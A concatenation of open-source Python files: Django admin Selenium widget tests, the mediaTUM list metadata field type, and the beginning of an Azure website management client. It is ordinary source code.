self.get_css_value('#clockbox0', 'display'), 'block')
self.assertEqual(
[
x.text for x in
self.selenium.find_elements_by_xpath("//ul[@class='timelist']/li/a")
],
['Now', 'Midnight', '6 a.m.', 'Noon', '6 p.m.']
)
# Press the ESC key
self.selenium.find_element_by_tag_name('body').send_keys([Keys.ESCAPE])
# Check that the time picker is hidden again
self.assertEqual(
self.get_css_value('#clockbox0', 'display'), 'none')
def test_calendar_nonday_class(self):
"""
Ensure cells that are not days of the month have the `nonday` CSS class.
Refs #4574.
"""
self.admin_login(username='super', password='secret', login_url='/')
# Open a page that has a date and time picker widgets
self.selenium.get('%s%s' % (self.live_server_url,
reverse('admin:admin_widgets_member_add')))
# fill in the birth date.
self.selenium.find_element_by_id('id_birthdate_0').send_keys('2013-06-01')
# Click the calendar icon
self.selenium.find_element_by_id('calendarlink0').click()
# get all the tds within the calendar
calendar0 = self.selenium.find_element_by_id('calendarin0')
tds = calendar0.find_elements_by_tag_name('td')
# make sure the first and last 6 cells have class nonday
for td in tds[:6] + tds[-6:]:
self.assertEqual(td.get_attribute('class'), 'nonday')
def test_calendar_selected_class(self):
"""
Ensure cell for the day in the input has the `selected` CSS class.
Refs #4574.
"""
self.admin_login(username='super', password='secret', login_url='/')
# Open a page that has a date and time picker widgets
self.selenium.get('%s%s' % (self.live_server_url,
reverse('admin:admin_widgets_member_add')))
# fill in the birth date.
self.selenium.find_element_by_id('id_birthdate_0').send_keys('2013-06-01')
# Click the calendar icon
self.selenium.find_element_by_id('calendarlink0').click()
# get all the tds within the calendar
calendar0 = self.selenium.find_element_by_id('calendarin0')
tds = calendar0.find_elements_by_tag_name('td')
# verify the selected cell
selected = tds[6]
self.assertEqual(selected.get_attribute('class'), 'selected')
self.assertEqual(selected.text, '1')
def test_calendar_no_selected_class(self):
"""
Ensure no cells are given the selected class when the field is empty.
Refs #4574.
"""
self.admin_login(username='super', password='secret', login_url='/')
# Open a page that has a date and time picker widgets
self.selenium.get('%s%s' % (self.live_server_url,
reverse('admin:admin_widgets_member_add')))
# Click the calendar icon
self.selenium.find_element_by_id('calendarlink0').click()
# get all the tds within the calendar
calendar0 = self.selenium.find_element_by_id('calendarin0')
tds = calendar0.find_elements_by_tag_name('td')
# verify there are no cells with the selected class
selected = [td for td in tds if td.get_attribute('class') == 'selected']
self.assertEqual(len(selected), 0)
def test_calendar_show_date_from_input(self):
"""
Ensure that the calendar show the date from the input field for every
locale supported by django.
"""
self.admin_login(username='super', password='secret', login_url='/')
# Enter test data
member = models.Member.objects.create(name='Bob', birthdate=datetime(1984, 5, 15), gender='M')
# Get month name translations for every locale
month_string = 'May'
path = os.path.join(os.path.dirname(import_module('django.contrib.admin').__file__), 'locale')
for language_code, language_name in settings.LANGUAGES:
try:
catalog = gettext.translation('djangojs', path, [language_code])
except IOError:
continue
if month_string in catalog._catalog:
month_name = catalog._catalog[month_string]
else:
month_name = month_string
# Get the expected caption
may_translation = month_name
expected_caption = '{0:s} {1:d}'.format(may_translation.upper(), 1984)
# Test with every locale
with override_settings(LANGUAGE_CODE=language_code, USE_L10N=True):
# Open a page that has a date picker widget
self.selenium.get('{}{}'.format(self.live_server_url,
reverse('admin:admin_widgets_member_change', args=(member.pk,))))
# Click on the calendar icon
self.selenium.find_element_by_id('calendarlink0').click()
# Make sure that the right month and year are displayed
self.wait_for_text('#calendarin0 caption', expected_caption)
class DateTimePickerSeleniumChromeTests(DateTimePickerSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.chrome.webdriver.WebDriver'
class DateTimePickerSeleniumIETests(DateTimePickerSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.ie.webdriver.WebDriver'
@skipIf(pytz is None, "this test requires pytz")
@override_settings(TIME_ZONE='Asia/Singapore')
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF='admin_widgets.urls')
class DateTimePickerShortcutsSeleniumFirefoxTests(SeleniumDataMixin, AdminSeleniumWebDriverTestCase):
available_apps = ['admin_widgets'] + AdminSeleniumWebDriverTestCase.available_apps
webdriver_class = 'selenium.webdriver.firefox.webdriver.WebDriver'
def test_date_time_picker_shortcuts(self):
"""
Ensure that date/time/datetime picker shortcuts work in the current time zone.
Refs #20663.
This test case is fairly tricky, it relies on selenium still running the browser
in the default time zone "America/Chicago" despite `override_settings` changing
the time zone to "Asia/Singapore".
"""
self.admin_login(username='super', password='secret', login_url='/')
error_margin = timedelta(seconds=10)
# If we are neighbouring a DST, we add an hour of error margin.
tz = pytz.timezone('America/Chicago')
utc_now = datetime.now(pytz.utc)
tz_yesterday = (utc_now - timedelta(days=1)).astimezone(tz).tzname()
tz_tomorrow = (utc_now + timedelta(days=1)).astimezone(tz).tzname()
if tz_yesterday != tz_tomorrow:
error_margin += timedelta(hours=1)
now = datetime.now()
self.selenium.get('%s%s' % (self.live_server_url,
reverse('admin:admin_widgets_member_add')))
self.selenium.find_element_by_id('id_name').send_keys('test')
# Click on the "today" and "now" shortcuts.
shortcuts = self.selenium.find_elements_by_css_selector(
'.field-birthdate .datetimeshortcuts')
for shortcut in shortcuts:
shortcut.find_element_by_tag_name('a').click()
# Check that there is a time zone mismatch warning.
# Warning: This would effectively fail if the TIME_ZONE defined in the
# settings has the same UTC offset as "Asia/Singapore" because the
# mismatch warning would be rightfully missing from the page.
self.selenium.find_elements_by_css_selector(
'.field-birthdate .timezonewarning')
# Submit the form.
self.selenium.find_element_by_tag_name('form').submit()
self.wait_page_loaded()
# Make sure that "now" in javascript is within 10 seconds
# from "now" on the server side.
member = models.Member.objects.get(name='test')
self.assertGreater(member.birthdate, now - error_margin)
self.assertLess(member.birthdate, now + error_margin)
class DateTimePickerShortcutsSeleniumChromeTests(DateTimePickerShortcutsSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.chrome.webdriver.WebDriver'
class DateTimePickerShortcutsSeleniumIETests(DateTimePickerShortcutsSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.ie.webdriver.WebDriver'
# The above tests run with Asia/Singapore which are on the positive side of
# UTC. Here we test with a timezone on the negative side.
@override_settings(TIME_ZONE='US/Eastern')
class DateTimePickerAltTimezoneSeleniumFirefoxTests(DateTimePickerShortcutsSeleniumFirefoxTests):
pass
class DateTimePickerAltTimezoneSeleniumChromeTests(DateTimePickerAltTimezoneSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.chrome.webdriver.WebDriver'
class DateTimePickerAltTimezoneSeleniumIETests(DateTimePickerAltTimezoneSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.ie.webdriver.WebDriver'
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF='admin_widgets.urls')
class HorizontalVerticalFilterSeleniumFirefoxTests(SeleniumDataMixin, AdminSeleniumWebDriverTestCase):
available_apps = ['admin_widgets'] + AdminSeleniumWebDriverTestCase.available_apps
webdriver_class = 'selenium.webdriver.firefox.webdriver.WebDriver'
def setUp(self):
super(HorizontalVerticalFilterSeleniumFirefoxTests, self).setUp()
self.lisa = models.Student.objects.create(name='Lisa')
self.john = models.Student.objects.create(name='John')
self.bob = models.Student.objects.create(name='Bob')
self.peter = models.Student.objects.create(name='Peter')
self.jenny = models.Student.objects.create(name='Jenny')
self.jason = models.Student.objects.create(name='Jason')
self.cliff = models.Student.objects.create(name='Cliff')
self.arthur = models.Student.objects.create(name='Arthur')
self.school = models.School.objects.create(name='School of Awesome')
def assertActiveButtons(self, mode, field_name, choose, remove,
choose_all=None, remove_all=None):
choose_link = '#id_%s_add_link' % field_name
choose_all_link = '#id_%s_add_all_link' % field_name
remove_link = '#id_%s_remove_link' % field_name
remove_all_link = '#id_%s_remove_all_link' % field_name
self.assertEqual(self.has_css_class(choose_link, 'active'), choose)
self.assertEqual(self.has_css_class(remove_link, 'active'), remove)
if mode == 'horizontal':
self.assertEqual(self.has_css_class(choose_all_link, 'active'), choose_all)
self.assertEqual(self.has_css_class(remove_all_link, 'active'), remove_all)
def execute_basic_operations(self, mode, field_name):
from_box = '#id_%s_from' % field_name
to_box = '#id_%s_to' % field_name
choose_link = 'id_%s_add_link' % field_name
choose_all_link = 'id_%s_add_all_link' % field_name
remove_link = 'id_%s_remove_link' % field_name
remove_all_link = 'id_%s_remove_all_link' % field_name
# Initial positions ---------------------------------------------------
self.assertSelectOptions(from_box,
[str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id)])
self.assertSelectOptions(to_box,
[str(self.lisa.id), str(self.peter.id)])
self.assertActiveButtons(mode, field_name, False, False, True, True)
# Click 'Choose all' --------------------------------------------------
if mode == 'horizontal':
self.selenium.find_element_by_id(choose_all_link).click()
elif mode == 'vertical':
# There 's no 'Choose all' button in vertical mode, so individually
# select all options and click 'Choose'.
for option in self.selenium.find_elements_by_css_selector(from_box + ' > option'):
option.click()
self.selenium.find_element_by_id(choose_link).click()
self.assertSelectOptions(from_box, [])
self.assertSelectOptions(to_box,
[str(self.lisa.id), str(self.peter.id),
str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id)])
self.assertActiveButtons(mode, field_name, False, False, False, True)
# Click 'Remove all' --------------------------------------------------
if mode == 'horizontal':
self.selenium.find_element_by_id(remove_all_link).click()
elif mode == 'vertical':
# There 's no 'Remove all' button in vertical mode, so individually
# select all options and click 'Remove'.
for option in self.selenium.find_elements_by_css_selector(to_box + ' > option'):
option.click()
self.selenium.find_element_by_id(remove_link).click()
self.assertSelectOptions(from_box,
[str(self.lisa.id), str(self.peter.id),
str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id)])
self.assertSelectOptions(to_box, [])
self.assertActiveButtons(mode, field_name, False, False, True, False)
# Choose some options ------------------------------------------------
from_lisa_select_option = self.get_select_option(from_box, str(self.lisa.id))
# Check the title attribute is there for tool tips: ticket #20821
self.assertEqual(from_lisa_select_option.get_attribute('title'), from_lisa_select_option.get_attribute('text'))
from_lisa_select_option.click()
self.get_select_option(from_box, str(self.jason.id)).click()
self.get_select_option(from_box, str(self.bob.id)).click()
self.get_select_option(from_box, str(self.john.id)).click()
self.assertActiveButtons(mode, field_name, True, False, True, False)
self.selenium.find_element_by_id(choose_link).click()
self.assertActiveButtons(mode, field_name, False, False, True, True)
self.assertSelectOptions(from_box,
[str(self.peter.id), str(self.arthur.id),
str(self.cliff.id), str(self.jenny.id)])
self.assertSelectOptions(to_box,
[str(self.lisa.id), str(self.bob.id),
str(self.jason.id), str(self.john.id)])
# Check the tooltip is still there after moving: ticket #20821
to_lisa_select_option = self.get_select_option(to_box, str(self.lisa.id))
self.assertEqual(to_lisa_select_option.get_attribute('title'), to_lisa_select_option.get_attribute('text'))
# Remove some options -------------------------------------------------
self.get_select_option(to_box, str(self.lisa.id)).click()
self.get_select_option(to_box, str(self.bob.id)).click()
self.assertActiveButtons(mode, field_name, False, True, True, True)
self.selenium.find_element_by_id(remove_link).click()
self.assertActiveButtons(mode, field_name, False, False, True, True)
self.assertSelectOptions(from_box,
[str(self.peter.id), str(self.arthur.id),
str(self.cliff.id), str(self.jenny.id),
str(self.lisa.id), str(self.bob.id)])
self.assertSelectOptions(to_box,
[str(self.jason.id), str(self.john.id)])
# Choose some more options --------------------------------------------
self.get_select_option(from_box, str(self.arthur.id)).click()
self.get_select_option(from_box, str(self.cliff.id)).click()
self.selenium.find_element_by_id(choose_link).click()
self.assertSelectOptions(from_box,
[str(self.peter.id), str(self.jenny.id),
str(self.lisa.id), str(self.bob.id)])
self.assertSelectOptions(to_box,
[str(self.jason.id), str(self.john.id),
str(self.arthur.id), str(self.cliff.id)])
def test_basic(self):
self.school.students.set([self.lisa, self.peter])
self.school.alumni.set([self.lisa, self.peter])
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get('%s%s' % (
self.live_server_url, reverse('admin:admin_widgets_school_change', args=(self.school.id,))))
self.wait_page_loaded()
self.execute_basic_operations('vertical', 'students')
self.execute_basic_operations('horizontal', 'alumni')
# Save and check that everything is properly stored in the database ---
self.selenium.find_element_by_xpath('//input[@value="Save"]').click()
self.wait_page_loaded()
self.school = models.School.objects.get(id=self.school.id) # Reload from database
self.assertEqual(list(self.school.students.all()),
[self.arthur, self.cliff, self.jason, self.john])
self.assertEqual(list(self.school.alumni.all()),
[self.arthur, self.cliff, self.jason, self.john])
def test_filter(self):
"""
Ensure that typing in the search box filters out options displayed in
the 'from' box.
"""
from selenium.webdriver.common.keys import Keys
self.school.students.set([self.lisa, self.peter])
self.school.alumni.set([self.lisa, self.peter])
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get(
'%s%s' % (self.live_server_url, reverse('admin:admin_widgets_school_change', args=(self.school.id,))))
for field_name in ['students', 'alumni']:
from_box = '#id_%s_from' % field_name
to_box = '#id_%s_to' % field_name
choose_link = '#id_%s_add_link' % field_name
remove_link = '#id_%s_remove_link' % field_name
input = self.selenium.find_element_by_css_selector('#id_%s_input' % field_name)
# Initial values
self.assertSelectOptions(from_box,
[str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id)])
# Typing in some characters filters out non-matching options
input.send_keys('a')
self.assertSelectOptions(from_box, [str(self.arthur.id), str(self.jason.id)])
input.send_keys('R')
self.assertSelectOptions(from_box, [str(self.arthur.id)])
# Clearing the text box makes the other options reappear
input.send_keys([Keys.BACK_SPACE])
self.assertSelectOptions(from_box, [str(self.arthur.id), str(self.jason.id)])
input.send_keys([Keys.BACK_SPACE])
self.assertSelectOptions(from_box,
[str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jason.id),
str(self.jenny.id), str(self.john.id)])
# -----------------------------------------------------------------
# Check that choosing a filtered option sends it properly to the
# 'to' box.
input.send_keys('a')
self.assertSelectOptions(from_box, [str(self.arthur.id), str(self.jason.id)])
self.get_select_option(from_box, str(self.jason.id)).click()
self.selenium.find_element_by_css_selector(choose_link).click()
self.assertSelectOptions(from_box, [str(self.arthur.id)])
self.assertSelectOptions(to_box,
[str(self.lisa.id), str(self.peter.id),
str(self.jason.id)])
self.get_select_option(to_box, str(self.lisa.id)).click()
self.selenium.find_element_by_css_selector(remove_link).click()
self.assertSelectOptions(from_box,
[str(self.arthur.id), str(self.lisa.id)])
self.assertSelectOptions(to_box,
[str(self.peter.id), str(self.jason.id)])
input.send_keys([Keys.BACK_SPACE]) # Clear text box
self.assertSelectOptions(from_box,
[str(self.arthur.id), str(self.bob.id),
str(self.cliff.id), str(self.jenny.id),
str(self.john.id), str(self.lisa.id)])
self.assertSelectOptions(to_box,
[str(self.peter.id), str(self.jason.id)])
# -----------------------------------------------------------------
# Check that pressing enter on a filtered option sends it properly
# to the 'to' box.
self.get_select_option(to_box, str(self.jason.id)).click()
self.selenium.find_element_by_css_selector(remove_link).click()
input.send_keys('ja')
self.assertSelectOptions(from_box, [str(self.jason.id)])
input.send_keys([Keys.ENTER])
self.assertSelectOptions(to_box, [str(self.peter.id), str(self.jason.id)])
input.send_keys([Keys.BACK_SPACE, Keys.BACK_SPACE])
# Save and check that everything is properly stored in the database ---
self.selenium.find_element_by_xpath('//input[@value="Save"]').click()
self.wait_page_loaded()
self.school = models.School.objects.get(id=self.school.id) # Reload from database
self.assertEqual(list(self.school.students.all()),
[self.jason, self.peter])
self.assertEqual(list(self.school.alumni.all()),
[self.jason, self.peter])
class HorizontalVerticalFilterSeleniumChromeTests(HorizontalVerticalFilterSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.chrome.webdriver.WebDriver'
class HorizontalVerticalFilterSeleniumIETests(HorizontalVerticalFilterSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.ie.webdriver.WebDriver'
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF='admin_widgets.urls')
class AdminRawIdWidgetSeleniumFirefoxTests(SeleniumDataMixin, AdminSeleniumWebDriverTestCase):
available_apps = ['admin_widgets'] + AdminSeleniumWebDriverTestCase.available_apps
webdriver_class = 'selenium.webdriver.firefox.webdriver.WebDriver'
def setUp(self):
super(AdminRawIdWidgetSeleniumFirefoxTests, self).setUp()
models.Band.objects.create(id=42, name='Bogey Blues')
models.Band.objects.create(id=98, name='Green Potatoes')
def test_ForeignKey(self):
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get(
'%s%s' % (self.live_server_url, reverse('admin:admin_widgets_event_add')))
main_window = self.selenium.current_window_handle
# No value has been selected yet
self.assertEqual(
self.selenium.find_element_by_id('id_main_band').get_attribute('value'),
'')
# Open the popup window and click on a band
self.selenium.find_element_by_id('lookup_id_main_band').click()
self.wait_for_popup()
self.selenium.switch_to.window('id_main_band')
link = self.selenium.find_element_by_link_text('Bogey Blues')
self.assertIn('/band/42/', link.get_attribute('href'))
link.click()
# The field now contains the selected band's id
self.selenium.switch_to.window(main_window)
self.wait_for_value('#id_main_band', '42')
# Reopen the popup window and click on another band
self.selenium.find_element_by_id('lookup_id_main_band').click()
self.wait_for_popup()
self.selenium.switch_to.window('id_main_band')
link = self.selenium.find_element_by_link_text('Green Potatoes')
self.assertIn('/band/98/', link.get_attribute('href'))
link.click()
# The field now contains the other selected band's id
self.selenium.switch_to.window(main_window)
self.wait_for_value('#id_main_band', '98')
def test_many_to_many(self):
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get(
'%s%s' % (self.live_server_url, reverse('admin:admin_widgets_event_add')))
main_window = self.selenium.current_window_handle
# No value has been selected yet
self.assertEqual(
self.selenium.find_element_by_id('id_supporting_bands').get_attribute('value'),
'')
# Open the popup window and click on a band
self.selenium.find_element_by_id('lookup_id_supporting_bands').click()
self.wait_for_popup()
self.selenium.switch_to.window('id_supporting_bands')
link = self.selenium.find_element_by_link_text('Bogey Blues')
self.assertIn('/band/42/', link.get_attribute('href'))
link.click()
# The field now contains the selected band's id
self.selenium.switch_to.window(main_window)
self.wait_for_value('#id_supporting_bands', '42')
# Reopen the popup window and click on another band
self.selenium.find_element_by_id('lookup_id_supporting_bands').click()
self.wait_for_popup()
self.selenium.switch_to.window('id_supporting_bands')
link = self.selenium.find_element_by_link_text('Green Potatoes')
self.assertIn('/band/98/', link.get_attribute('href'))
link.click()
# The field now contains the two selected bands' ids
self.selenium.switch_to.window(main_window)
self.wait_for_value('#id_supporting_bands', '42,98')
class AdminRawIdWidgetSeleniumChromeTests(AdminRawIdWidgetSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.chrome.webdriver.WebDriver'
class AdminRawIdWidgetSeleniumIETests(AdminRawIdWidgetSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.ie.webdriver.WebDriver'
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF='admin_widgets.urls')
class RelatedFieldWidgetSeleniumFirefoxTests(SeleniumDataMixin, AdminSeleniumWebDriverTestCase):
available_apps = ['admin_widgets'] + AdminSeleniumWebDriverTestCase.available_apps
webdriver_class = 'selenium.webdriver.firefox.webdriver.WebDriver'
def test_ForeignKey_using_to_field(self):
self.admin_login(username='super', password='secret', login_url='/')
self.selenium.get('%s%s' % (
self.live_server_url,
reverse('admin:admin_widgets_profile_add')))
main_window = self.selenium.current_window_handle
# Click the Add User button to add new
self.selenium.find_element_by_id('add_id_user').click()
self.wait_for_popup()
self.selenium.switch_to.window('id_user')
self.wait_for('#id_password')
password_field = self.selenium.find_element_by_id('id_password')
password_field.send_keys('password')
username_field = self.selenium.find_element_by_id('id_username')
username_value = 'newuser'
username_field.send_keys(username_value)
save_button_css_selector = '.submit-row > input[type=submit]'
self.selenium.find_element_by_css_selector(save_button_css_selector).click()
self.selenium.switch_to.window(main_window)
# The field now contains the new user
self.wait_for('#id_user option[value="newuser"]')
# Click the Change User button to change it
self.selenium.find_element_by_id('change_id_user').click()
self.wait_for_popup()
self.selenium.switch_to.window('id_user')
self.wait_for('#id_username')
username_field = self.selenium.find_element_by_id('id_username')
username_value = 'changednewuser'
username_field.clear()
username_field.send_keys(username_value)
save_button_css_selector = '.submit-row > input[type=submit]'
self.selenium.find_element_by_css_selector(save_button_css_selector).click()
self.selenium.switch_to.window(main_window)
# Wait up to 2 seconds for the new option to show up after clicking save in the popup.
self.selenium.implicitly_wait(2)
self.selenium.find_element_by_css_selector('#id_user option[value=changednewuser]')
self.selenium.implicitly_wait(0)
# Go ahead and submit the form to make sure it works
self.selenium.find_element_by_css_selector(save_button_css_selector).click()
self.wait_for_text('li.success', 'The profile "changednewuser" was added successfully.')
profiles = models.Profile.objects.all()
self.assertEqual(len(profiles), 1)
self.assertEqual(profiles[0].user.username, username_value)
class RelatedFieldWidgetSeleniumChromeTests(RelatedFieldWidgetSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.chrome.webdriver.WebDriver'
class RelatedFieldWidgetSeleniumIETests(RelatedFieldWidgetSeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.ie.webdriver.WebDriver'
| bsd-3-clause |
mediatum/mediatum | metadata/list.py | 1 | 7868 | """
mediatum - a multimedia content repository
Copyright (C) 2007 Arne Seifert <[email protected]>
Copyright (C) 2007 Matthias Kramm <[email protected]>
Copyright (C) 2012 Iryna Feuerstein <[email protected]>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import logging
import os
import codecs
from mediatumtal import tal
from utils.utils import esc
from core.metatype import Metatype, Context
from metadata.ilist import count_list_values_for_all_content_children
from core import Node
from core import db
q = db.query
logg = logging.getLogger(__name__)
class m_list(Metatype):
def formatValues(self, context):
valuelist = []
items = {}
try:
n = context.collection
if not isinstance(n, Node):
raise KeyError
field_name = context.field.getName()
id_attr_val = count_list_values_for_all_content_children(n.id, field_name)
items = {pair[0]: pair[1] for pair in id_attr_val}
except KeyError:
None
tempvalues = context.field.getValueList()
valuesfiles = context.field.files.all()
if len(valuesfiles): # a text file with list values was uploaded
if os.path.isfile(valuesfiles[0].abspath):
with codecs.open(valuesfiles[0].abspath, 'r', encoding='utf8') as valuesfile:
tempvalues = valuesfile.readlines()
if len(tempvalues): # Has the user entered any values?
if tempvalues[0].find('|') > 0: # there are values in different languages available
languages = [x.strip() for x in tempvalues[0].split('|')] # find out the languages
valuesdict = dict((lang, []) for lang in languages) # create a dictionary with languages as keys,
# and list of respective values as dictionary values
for i in range(len(tempvalues)):
if i: # if i not 0 - the language names itself shouldn't be included to the values
tmp = tempvalues[i].split('|')
for j in range(len(tmp)):
valuesdict[languages[j]].append(tmp[j])
lang = context.language
# if there is no default language, the first language-value will be used
if (not lang) or (lang not in valuesdict.keys()):
lang = languages[0]
tempvalues = valuesdict[lang]
for val in tempvalues:
indent = 0
canbeselected = 0
while val.startswith("*"):
val = val[1:]
indent = indent + 1
if val.startswith(" "):
canbeselected = 1
val = val.strip()
if not indent:
canbeselected = 1
if indent > 0:
indent = indent - 1
indentstr = " " * (2 * indent)
num = 0
if val in items.keys():
num = int(items[val])
try:
if int(num) < 0:
raise Exception()
elif int(num) == 0:
num = ""
else:
num = " (" + ustr(num) + ")"
except:
logg.exception("exception in getMaskEditorHTML, using empty string")
num = ""
val = esc(val)
if not canbeselected:
valuelist.append(("optgroup", "<optgroup label=\"" + indentstr + val + "\">", "", ""))
elif (val in context.value.split(";")):
valuelist.append(("optionselected", indentstr, val, num))
else:
valuelist.append(("option", indentstr, val, num))
return valuelist
def getEditorHTML(self, field, value="", width=400, lock=0, language=None, required=None):
context = Context(field, value=value, width=width, name=field.getName(), lock=lock, language=language)
return tal.getTAL("metadata/list.html", {"context": context,
"valuelist": filter(lambda x: x != "", self.formatValues(context)),
"required": self.is_required(required)},
macro="editorfield",
language=language)
def getSearchHTML(self, context):
return tal.getTAL("metadata/list.html",
{"context": context,
"valuelist": filter(lambda x: x != "",
self.formatValues(context))},
macro="searchfield",
language=context.language)
def getFormattedValue(self, metafield, maskitem, mask, node, language, html=True):
value = node.get(metafield.getName()).replace(";", "; ")
if html:
value = esc(value)
return (metafield.getLabel(), value)
def format_request_value_for_db(self, field, params, item, language=None):
if field.get('multiple'):
valuelist = params.getlist(item)
value = ";".join(valuelist)
else:
value = params.get(item)
return value.replace("; ", ";")
def getMaskEditorHTML(self, field, metadatatype=None, language=None):
value = u""
filename = u""
multiple_list = u""
try:
if field:
value = field.getValues()
if field.id and len(field.files) > 0:
filename = os.path.basename(field.files[0].abspath)
multiple_list = field.get('multiple')
except AttributeError:
value = field
return tal.getTAL("metadata/list.html",
{"value": value,
"filename": filename,
"multiple_list": multiple_list},
macro="maskeditor",
language=language)
def getName(self):
return "fieldtype_list"
def getInformation(self):
return {"moduleversion": "1.1", "softwareversion": "1.1"}
# method for additional keys of type list
def getLabels(self):
return m_list.labels
labels = {"de":
[
("list_multiple", "Mehrfachauswahl:"),
("current_file", "Aktuelle Textdatei: "),
("delete_valuesfile", "Vorhandene Datei löschen"),
("list_list_values_file", "Datei mit Listenwerten:"),
("list_list_values", "Listenwerte:"),
("fieldtype_list", "Werteliste"),
("fieldtype_list_desc", "Werte-Auswahlfeld als Drop-Down Liste")
],
"en":
[
("list_multiple", "Multiple choice:"),
("current_file", "Current values file: "),
("delete_valuesfile", "Delete the current text file"),
("list_list_values_file", "Textfile with list values:"),
("list_list_values", "List values:"),
("fieldtype_list", "valuelist"),
("fieldtype_list_desc", "drop down valuelist")
]
}
| gpl-3.0 |
varunkumta/azure-linux-extensions | CustomScript/azure/servicemanagement/websitemanagementservice.py | 46 | 10015 | #-------------------------------------------------------------------------
# Copyright (c) Microsoft. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#--------------------------------------------------------------------------
from azure import (
MANAGEMENT_HOST,
_str,
)
from azure.servicemanagement import (
WebSpaces,
WebSpace,
Sites,
Site,
MetricResponses,
MetricDefinitions,
PublishData,
_XmlSerializer,
)
from azure.servicemanagement.servicemanagementclient import (
_ServiceManagementClient,
)
class WebsiteManagementService(_ServiceManagementClient):
''' Note that this class is a preliminary work on WebSite
management. Since it lack a lot a features, final version
can be slightly different from the current one.
'''
def __init__(self, subscription_id=None, cert_file=None,
host=MANAGEMENT_HOST):
super(WebsiteManagementService, self).__init__(
subscription_id, cert_file, host)
#--Operations for web sites ----------------------------------------
def list_webspaces(self):
'''
List the webspaces defined on the account.
'''
return self._perform_get(self._get_list_webspaces_path(),
WebSpaces)
def get_webspace(self, webspace_name):
'''
Get details of a specific webspace.
webspace_name: The name of the webspace.
'''
return self._perform_get(self._get_webspace_details_path(webspace_name),
WebSpace)
def list_sites(self, webspace_name):
'''
List the web sites defined on this webspace.
webspace_name: The name of the webspace.
'''
return self._perform_get(self._get_sites_path(webspace_name),
Sites)
def get_site(self, webspace_name, website_name):
'''
List the web sites defined on this webspace.
webspace_name: The name of the webspace.
website_name: The name of the website.
'''
return self._perform_get(self._get_sites_details_path(webspace_name,
website_name),
Site)
def create_site(self, webspace_name, website_name, geo_region, host_names,
plan='VirtualDedicatedPlan', compute_mode='Shared',
server_farm=None, site_mode=None):
'''
Create a website.
webspace_name: The name of the webspace.
website_name: The name of the website.
geo_region:
The geographical region of the webspace that will be created.
host_names:
An array of fully qualified domain names for website. Only one
hostname can be specified in the azurewebsites.net domain.
The hostname should match the name of the website. Custom domains
can only be specified for Shared or Standard websites.
plan:
This value must be 'VirtualDedicatedPlan'.
compute_mode:
This value should be 'Shared' for the Free or Paid Shared
offerings, or 'Dedicated' for the Standard offering. The default
value is 'Shared'. If you set it to 'Dedicated', you must specify
a value for the server_farm parameter.
server_farm:
The name of the Server Farm associated with this website. This is
a required value for Standard mode.
site_mode:
Can be None, 'Limited' or 'Basic'. This value is 'Limited' for the
Free offering, and 'Basic' for the Paid Shared offering. Standard
mode does not use the site_mode parameter; it uses the compute_mode
parameter.
'''
xml = _XmlSerializer.create_website_to_xml(webspace_name, website_name, geo_region, plan, host_names, compute_mode, server_farm, site_mode)
return self._perform_post(
self._get_sites_path(webspace_name),
xml,
Site)
def delete_site(self, webspace_name, website_name,
delete_empty_server_farm=False, delete_metrics=False):
'''
Delete a website.
webspace_name: The name of the webspace.
website_name: The name of the website.
delete_empty_server_farm:
If the site being deleted is the last web site in a server farm,
you can delete the server farm by setting this to True.
delete_metrics:
To also delete the metrics for the site that you are deleting, you
can set this to True.
'''
path = self._get_sites_details_path(webspace_name, website_name)
query = ''
if delete_empty_server_farm:
query += '&deleteEmptyServerFarm=true'
if delete_metrics:
query += '&deleteMetrics=true'
if query:
path = path + '?' + query.lstrip('&')
return self._perform_delete(path)
def restart_site(self, webspace_name, website_name):
'''
Restart a web site.
webspace_name: The name of the webspace.
website_name: The name of the website.
'''
return self._perform_post(
self._get_restart_path(webspace_name, website_name),
'')
def get_historical_usage_metrics(self, webspace_name, website_name,
metrics = None, start_time=None, end_time=None, time_grain=None):
'''
Get historical usage metrics.
webspace_name: The name of the webspace.
website_name: The name of the website.
